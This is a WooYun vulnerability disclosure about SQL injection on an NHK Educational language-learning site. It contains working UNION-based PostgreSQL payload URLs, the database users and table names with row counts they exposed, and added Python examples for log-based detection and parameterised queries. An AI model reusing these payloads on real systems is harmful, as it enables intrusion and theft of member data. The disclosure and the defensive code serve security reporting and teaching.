
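Vulnerability summary

Bug ID: wooyun-2016-0184973

Vulnerability title: NHK Co., Ltd. SQL injection, 477533 member leak

Vendor: NHK Educational Corporation

Author: 路人甲

Submitted: 2016-03-15 16:21

Fixed: 2016-05-02 16:18

Disclosed: 2016-05-02 16:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Vulnerability status: handed over to a third-party partner organization (Japan's national internet emergency response center, JPCERT/CC) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]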


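Vulnerability details

Disclosure status:

2016-03-15: Details reported to the vendor; awaiting vendor handling
2016-03-18: Vendor confirmed; details disclosed to the vendor only
2016-03-28: Details disclosed to core white hats and experts in related fields
2016-04-07: Details disclosed to regular white hats
2016-04-17: Details disclosed to intern white hats
2016-05-02: Details disclosed to the public

Brief description:

NHK Educational Corporation (株式会社NHKエデュケーショナル) produces all of NHK's language-learning programs under commission from NHK (Japan Broadcasting Corporation).
NHK Educational Corporation is an NHK affiliate founded in 1989 (Heisei 1). It produces more than 8,000 educational television programs a year, including language programs, and also provides services beyond broadcasting, such as producing video products based on its programs and holding related events.
NHK Co., Ltd. SQL injection, 477533 member leak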

Detailed description:

SQL injection URL:http://**.**.**.**/review/detail.php?program=r_french&id=209

Proof of vulnerability:

URL1:http://**.**.**.**/review/detail.php?program=-5692%27%20UNION%20ALL%20SELECT%20NULL,%28SELECT%20%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29||COALESCE%28CAST%28usename%20AS%20CHARACTER%2810000%29%29,%28CHR%2845%29%29%29||%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29%20FROM%20pg_user%20OFFSET%200%20LIMIT%201%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&id=209

URL2:http://**.**.**.**/review/detail.php?program=-4795%27%20UNION%20ALL%20SELECT%20NULL%2C%28SELECT%20%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29||COALESCE%28CAST%28usename%20AS%20CHARACTER%2810000%29%29%2C%28CHR%2845%29%29%29||%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29%20FROM%20pg_user%20OFFSET%201%20LIMIT%201%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-&id=209
URL3:http://**.**.**.**/review/detail.php?program=-5451%27%20UNION%20ALL%20SELECT%20NULL,%28SELECT%20%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29||COALESCE%28CAST%28usename%20AS%20CHARACTER%2810000%29%29,%28CHR%2845%29%29%29||%28CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29||CHR%2845%29%29%20FROM%20pg_user%20OFFSET%202%20LIMIT%201%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-&id=209
database management system users [3]:
[*] gogakuru_sqluser
[*] nhke01
[*] postgres
Database: public
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| t_myphrase | 8050885 |
| t_test_log | 2927319 |
| t_member_genre | 2239507 |
| t_mycollection_rel | 1869152 |
| t_like_diary | 1684773 |
| t_tagging | 1502858 |
| t_learning_comment | 782505 |
| t_learning_record | 739961 |
| t_learning_diary | 615168 |
| t_sum_phrase_tag_count | 493435 |
| t_member | 477533 |
| t_statistics_monthly | 367814 |
| t_member_dump_20130401 | 338889 |
| t_popular_tag | 336966 |
| t_tag_phrase_count | 321030 |
| t_learning_goal | 294307 |
| t_dictation_result | 199794 |
| t_last_mycollection_update_ts | 197620 |
| t_statistics_daily | 183765 |
| t_ranking_mycollection_total | 149809 |
| t_ranking_mycollection_update_ts | 149809 |
| t_mycollection_category | 124358 |
| t_learning_goal_record | 119361 |
| t_yakunitatta | 112543 |
| t_mycollection | 95571 |
| t_sum_mycollection_bm_count_log | 82397 |
| yourphrase_vote_log | 79444 |
| t_mycollection_bookmark | 73971 |
| t_tag_daily_count | 64714 |
| t_sum_tag_count | 49557 |
| t_tag | 48189 |
| t_tweet_phrase | 40283 |
| access_log | 40217 |
| my_link | 39736 |
| pr_count | 38298 |
| t_tag_count | 31413 |
| t_phrase | 27503 |
| t_sum_myphrase_count | 27361 |
| t_session_info | 27299 |
| t_subscribe | 26821 |
| t_manavino_log | 25800 |
| t_session | 24830 |
| my_present_apply | 20511 |
| t_profile_log | 16167 |
| my_workbook | 15972 |
| t_notreach | 15444 |
| t_tweet_testmycollection_history | 14791 |
| t_questionnaire | 10059 |
| t_dictation_phrase | 8715 |
| t_sum_mycollection_bm_count_total | 6628 |
| check_answer | 3858 |
| enquete_20080428 | 3388 |
| t_filling_quiz_history | 3339 |
| enquete_nbk | 3035 |
| enquete_20070725 | 2125 |
| t_enquete_20150330 | 2077 |
| review_2008 | 1859 |
| ms_chinese | 1718 |
| ms_object | 1718 |
| enquete_20071221 | 1698 |
| rel_object | 1693 |
| yourphrase | 1519 |
| present_apply | 981 |
| t_news | 957 |
| travel_phrase | 910 |
| review_2009 | 832 |
| shopping_phrase | 802 |
| inquiry | 795 |
| review | 736 |
| t_recommend_phraseset | 644 |
| t_tweet_testmycollection | 463 |
| t_filling_quiz | 450 |
| t_program_genre | 427 |
| tsubo_learning | 396 |
| urchin_log | 365 |
| t_tag_mig | 339 |
| t_block_member | 301 |
| t_ranking_mycollection_weekly | 265 |
| tsubo_info | 251 |
| event_apply | 250 |
| review_2010 | 250 |
| review_2010_20140526 | 250 |
| movie | 247 |
| enquete_20071220 | 236 |
| t_program | 236 |
| t_recommend_diary | 224 |
| charo_museum | 200 |
| t_learning_diary_20130717 | 186 |
| charo | 126 |
| anne_message | 101 |
| charo_movie | 92 |
| t_learning_diary_20130717_main | 81 |
| toukou | 75 |
| topics | 69 |
| program_2009 | 46 |
| administrator | 45 |
| message | 42 |
| program_2008 | 42 |
| question | 42 |
| present | 39 |
| top_information | 37 |
| program | 33 |
| pr | 29 |
| anne | 24 |
| my_present | 24 |
| t_learning_diary_top | 24 |
| program_2010 | 16 |
| t_admin | 14 |
| workbook | 12 |
| calender_quiz | 11 |
| check_question | 9 |
| cm | 5 |
| thema | 2 |
+-----------------------------------+---------+
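
The proof URLs above share a recognisable shape in the "program" parameter: a quote break, UNION ALL SELECT, CHR(45)||CHR(45) markers, a PostgreSQL catalog name (pg_user) and a trailing "-- -" comment. The following Python sketch is an added example, not part of the original report: it scores the decoded query parameters of access-log lines against those signals. The rule names, the two-signal threshold and the log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signals drawn from the shape of the report's proof URLs. Rule names and the
# two-signal threshold are choices made for this example.
RULES = {
    "quote_break": re.compile(r"^-?\d*'"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "chr_concat": re.compile(r"chr\(\d+\)\s*\|\|\s*chr\(\d+\)", re.I),
    "pg_catalog": re.compile(r"\bpg_(?:user|shadow|database|tables)\b", re.I),
    "comment_tail": re.compile(r"--\s*-?\s*$"),
}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def score_request(target):
    """Map each query parameter that trips two or more rules to those rules."""
    hits = {}
    # parse_qsl percent-decodes, so %27 and %20 are matched as ' and space.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        matched = [rule for rule, rx in RULES.items() if rx.search(value)]
        if len(matched) >= 2:  # one signal alone (a lone apostrophe) is too noisy
            hits[name] = matched
    return hits

def scan(log_lines):
    """Return (client, request target, hits) for each flagged log line."""
    flagged = []
    for line in log_lines:
        m = LOG_RE.match(line)
        hits = score_request(m.group(2)) if m else {}
        if hits:
            flagged.append((m.group(1), m.group(2), hits))
    return flagged

# Constructed access-log lines (documentation IP ranges, shortened payload).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Mar/2016:16:00:01 +0900] '
    '"GET /review/detail.php?program=r_french&id=209 HTTP/1.1" 200 5120',
    '198.51.100.8 - - [15/Mar/2016:16:00:02 +0900] '
    '"GET /search.php?q=5%27%20tall HTTP/1.1" 200 812',
    '203.0.113.9 - - [15/Mar/2016:16:00:03 +0900] '
    '"GET /review/detail.php?program=-1%27%20UNION%20ALL%20SELECT%20NULL,'
    'CHR%2845%29||CHR%2845%29,NULL%20FROM%20pg_user--%20-&id=209 HTTP/1.1" 200 4980',
]

if __name__ == "__main__":
    for client, target, hits in scan(SAMPLE_LOG):
        print(client, hits)
```

Only the third constructed line is flagged; the lone apostrophe in the second line trips a single rule and stays below the threshold.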

Fix:

Filter the parameters.
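
Filtering is the remediation the report names. The sketch below is an added example, not the site's code: it pairs an allow-list check on "program" and "id" with bound query parameters, which is what keeps a request value out of the SQL text. It uses Python's sqlite3 in memory as a stand-in for the site's PostgreSQL database; the table names, the key pattern and the payload are assumptions constructed for the demonstration.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE review (program TEXT, id INTEGER, title TEXT);
        CREATE TABLE member (email TEXT);
        INSERT INTO review VALUES ('r_french', 209, 'Lesson 209');
        INSERT INTO member VALUES ('alice@example.test');
    """)
    return db

def detail_vulnerable(db, program, item_id):
    # Anti-pattern: request values are pasted into the SQL text, so a quote
    # in `program` ends the string literal and the rest is parsed as SQL.
    sql = f"SELECT title FROM review WHERE program = '{program}' AND id = {item_id}"
    return [row[0] for row in db.execute(sql)]

# Assumed shape of program keys such as r_french.
PROGRAM_RE = re.compile(r"[a-z][a-z0-9_]{0,31}")
ID_RE = re.compile(r"[0-9]{1,9}")

def detail_hardened(db, program, item_id):
    # Step 1: validate. Reject anything that is not a plain key or an integer.
    if not PROGRAM_RE.fullmatch(program) or not ID_RE.fullmatch(item_id):
        raise ValueError("invalid parameter")
    # Step 2: bind. The values travel separately from the SQL text.
    sql = "SELECT title FROM review WHERE program = ? AND id = ?"
    return [row[0] for row in db.execute(sql, (program, int(item_id)))]

def detail_bound_only(db, program, item_id):
    # Binding alone already makes the payload inert: it is compared as one
    # string value and matches no row. Validation is defence in depth.
    sql = "SELECT title FROM review WHERE program = ? AND id = ?"
    return [row[0] for row in db.execute(sql, (program, item_id))]

# Constructed payload in the same UNION style as the report's proof URLs.
PAYLOAD = "-1' UNION ALL SELECT email FROM member-- -"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", detail_vulnerable(db, PAYLOAD, "209"))
    print("bound only:", detail_bound_only(db, PAYLOAD, "209"))
```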

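Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2016-03-18 16:18

Vendor reply:

Latest status: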

2016-03-18: Hello 路人甲. This is JPCERT/CC. Thank you for your information. We will notify this information to the site administrator.